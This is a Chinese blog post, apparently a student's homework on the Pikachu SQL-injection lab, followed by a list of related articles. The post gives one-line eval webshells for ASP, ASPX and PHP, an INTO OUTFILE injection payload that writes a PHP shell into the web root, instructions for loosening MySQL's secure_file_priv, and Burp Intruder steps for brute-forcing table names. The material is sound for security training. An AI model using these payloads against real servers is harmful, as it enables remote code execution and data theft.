第五周作业 1.通过sqli进行服务器的远程控制案例测试 2.SQLInject漏洞的之表(列)暴力破解

最新推荐文章于 2023-04-28 14:45:00 发布
最新推荐文章于 2023-04-28 14:45:00 发布
阅读量240 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43899561/article/details/89074680
版权

1.关于演示中出现的问题的解决方案

一、数据库开启secure_file_priv
into outfile 可以将select的结果写入到指定目录的txt中,但需要数据库开启secure_file_priv。这里来演示怎么开启secure_file_priv。
登陆mysql输入 show global variables like '%secure%';(这里已经将secure_file_priv的值设为空,但正常显示为NULL和文件路径),显示这个界面来查看secure_file_priv的值。
在这里插入图片描述
为了修改secure_file_priv的值,打开my.cnfmy.ini(这两个文件通常是隐藏的,需要打开查看隐藏文件),添加一行 secure_file_priv=' '(将secure_file_priv的值设为空,之后就不限制mysqld在任意目录的导入导出)。重启mysql,输入show global variables like '%secure%';查看secure_file_priv的值。

2.sqli进行服务器的远程控制案例测试

一句话木马
一句话木马是一种短小而精悍的木马客户端,隐藏性号,且功能强大。
asp:<%eval request ("chopper")%>
aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["chopper"],"unsafe");%>
php:<?php @eval($_POST['chopper']);?>
使用into outfile需要有以下条件:
1.需要知道远程目录
2.需要远程目录有写权限
3.需要数据库开启secure_file_priv

输入kobe' union select "<?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"#将文件传入后
在打开新网页输入http://192.168.1.15/1.php?test=phpinfo();就能查看爆破出来的信息

3.SQLInject漏洞的暴力破解

设置payload vince' and exists (select * from aa)#到pikachu下输入。
在这里插入图片描述
在BrupSuite下找到对应的GET请求发送到Intruder下,和之前的方法一样,Clear所以变量后,将aa设为变量。再设置好payload(正常情况下是放自己的字典),并将Grep-Match下的信息清除,添加字符doesn’t exist。

在这里插入图片描述

在这里插入图片描述
点击攻击,没有被勾选的就是爆破出的表名
在这里插入图片描述

Frion_A
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql怎样修改my ini_修改mysql里面的my.ini文件后,如果让这个改动生效?
weixin_42548829的博客
02-28 4041
比如我们修改了my.ini文件的secure_file_priv变量的值如何让其真正生效?现在先看下我们系统中的secure_file_priv变量的值进入mysql输入代码如下show global variables like 'secure_file_priv';上面是一句mysql代码所以必须在mysql环境中执行。从上面可以看到当前mysql中变量secure_file_priv的值是一...
mysql一些有用的命令!(后续会持续更新)
qq_39209070的博客
03-12 119
1. show global variables like "%datadir%"; -- 定位到 MySQL 数据文件的存储位置方法 2.show variables like '%secure%'; -- mysql默认文件导出地址 3.ALTER EVENT XXXX ON COMPLETION PRESERVE ENABLE; -- 开启事件 4. SET GLOBAL ...
★SQL注入写WebShell&&DNSlog注入(配合盲注)
weixin_51339377的博客
03-22 506
SQL注入写webshell 1.什么是一句话木马 一句话木马是一种短小但是功能完善的木马客户端,通过它我们可以构造系统命令执行,从而 达到控制操作系统的目的。它的隐蔽性好,功能强大。一般来说渗透过程中遵从先传小马,再传 大马的逻辑。 我们把恶意的函数写入到文件里去,通过访问文件,搭建平台会执行文件中的参数,而这个文 件可以被我们利用来执行操作,从而达到了控制目标操作系统的目的。 方法1: 有三个条件: 1.首先需要知道远程目录(猜测+经验) 可以通过@@basedir 查询...
mysql语句进阶
weixin_45308292的博客
12-27 667
sql语句进阶 关于基本的sql语句使用,我放在了这篇博客,你们可以参考 我这章只将进阶知识 如果你发现有些命令输入后无法使用,可能是mysql版本过低 使用如下命令,查看mysql的版本 mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.26 | +-----------+ 1 row i...
mysql一些常见命令
u014439239的博客
01-28 517
根据日常使用情况总结了mysql的一些常见命令 //在root用户中,启动mysql服务 service mysqld start //查看启动状态 service mysqld status //停止mysql服务 service mysqld stop //切换到mysql用户 //首先查看mysql的安装位置,切换到安装位置 whereis  mysql //进入到mysql客户端 ...
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
最新发布
09-07
通达OA漏洞合集
Sqli注入Web测试环境.zip
02-13
这个"Sqli注入Web测试环境.zip"是一个专为测试和学习SQL注入漏洞而设计的靶场。靶场提供了实践和理解SQL注入攻击以及如何防御它们的机会。 首先,你需要一个Web服务器环境来运行这个靶场。这可能包括Apache、Nginx...
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,...
E020-渗透测试常用工具-使用w3af进行Web应用安全漏洞测试.pdf
12-02
5. **设置目标** 使用`target`模块设置扫描的目标,如`set target http://172.16.1.42`,指定要扫描的URL。 6. **漏洞扫描** 返回主模块后,通过`start`命令启动扫描。w3af会自动分析目标服务器的响应,寻找潜在...
SQLi Dumper v.8.0(国外SQL网站注入工具)
10-18
网站渗透,爆数据库.Beyond SQLi: Obfuscate and Bypass |=--------------------------------------------------------------------=| |=--------------=[ Beyond SQLi: Obfuscate and Bypass ]=---------------...
Mysql Getshell总结
qq_51478862的博客
05-05 1万+
获取网站根目录方式 (1) phpinfo() 页面:最理想的情况,直接显示web路径 (2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径 (3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径默认路径 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr.
mysql8.0.22导出数据错误
ahmcwt的专栏
11-27 284
环境:windows10+mysql8.0.22+navicat15 事出有因: mysql8.0.22导出数据: 执行命令: select * from customers into outfile 'd:/mysql/out.csv'; 提示错误: 1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement 如下图: 解决办法参考:.
Mysql_udf提权[超详细]|VulnHub-Raven:2渗透测试
qq_60115503的博客
04-22 2884
Mysql内置函数 Mysql有很多内置函数提供给使用者,包括字符串函数,数值函数,日期和时间函数等,给开发人员和使用者带来了很多方便 UDF介绍 Mysql的内置函数虽热丰富,但毕竟不能满足所有人的需求,有时候我们需要对中的数据进行一些处理而内置函数不能满足需要的时候,就需要对Mysql进行一些扩展,幸运的是,Mysql给使用者提供了添加新函数的机制,这种使用者自行添加的Mysql函数就称为UDF(User Define Function)UDF机制能够起作用,必须...
MYSQL新特性secure_file_priv 读写文件
热门推荐
终码一生
02-08 17万+
1290 – The MySQL server is running with the –secure-file-priv option so it cannot execute this statement secure-file-priv特性 secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定...
mysql导出导入文本文件的几种方式总结
eagle89的专栏
05-07 1万+
一、使用mysql命令导出文本文件 mysql命令可以用来登录MySQL服务器,也可以用来还原备份文件,同时,mysql命令也可以导出文本文件。 基本的语法格式如下: mysql -u root -pPassword -e "SELECT 语句" dbname>C:\name.txt 或者 mysql -u root -pPassword --exe...
数据库注入提权总结(一)
蚁景网安学院
08-09 569
报错注入是利用mysql在出错的时候会引出查询信息的特征。常见的布尔盲注场景有两种,一是返回值只有True或False的类型,二是Order by盲注。返回值只有True或False的类型。如果查询结果不为空,则返回True(或者是Success之类的),否则返回False。......
Sql Inject-SQL注入
田田云逸的博客
04-28 394
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。哦,SQL注入漏洞,可怕的漏洞
白话sql注入(sql Injection)系统总结
weixin_54603520的博客
03-23 962
数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。mysql中存在4个控制权限的,分别为user,db,tables_priv,columns_priv,mysql权限的验证过程为:先从user中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,
mysql正在运行安全文件怎么办_MySQL服务器正在使用--secure file priv选项运行,因此无法执行此语句...
weixin_29305337的博客
01-28 1234
secure-file-priv特性secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。ure_file_priv的值为null ,示限制mysqld 不允许导入|导出当secure_file_priv的值为/tmp/ ,示限制mysqld 的导入|导出只能发生在/tmp/目录下当secu...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、名、名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值